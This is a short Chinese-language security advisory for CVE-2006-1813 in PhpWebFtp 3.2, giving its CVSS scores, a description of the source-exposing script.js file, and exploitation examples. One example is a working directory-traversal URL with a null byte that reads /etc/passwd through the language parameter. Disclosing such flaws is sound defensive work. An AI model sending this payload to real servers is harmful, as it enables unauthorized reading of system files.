关键信息 漏洞概述 标题: PhpWebFtp 3.2 登录脚本 发现日期: 2006.04.17 风险级别: 中等 CVE编号: CVE-2006-1813 CWE编号: CWE-Other CVSS基础分数: 6.4/10 影响范围: 远程 影响子分: 4.9/10 利用复杂度: 低 影响面: - 机密性影响: 部分 - 完整性影响: 部分 - 可用性影响: 无 利用子分: 10/10 身份验证: 不需要 摘要 phpWebFtp允许连接到FTP服务器,即使在防火墙不放行流量的情况下。phpWebFtp通过在web服务器和FTP服务器之间建立FTP连接,并通过http协议将文件传输到你的web客户端,从而绕过防火墙。 问题描述 phpWebFtp v3.2及以下版本中,用户登录脚本是一个名为script.js的JavaScript文件,用于验证登录框中的用户输入。然而,该文件可以直接通过web浏览器访问,导致源代码泄露,这可能帮助攻击者触发代码注入。 利用方式 直接访问脚本: http://www.anysite.com/PhpWebFtp/include/script.js 目录遍历: 通过恶意参数相对phpWebFtp路径向web浏览器POST请求。 http://www.anysite.com/PhpWebFtp/index.php?server=1&port=21&goPassive=on&user=1&password=1&language=../../../../../../../../etc/passwd%00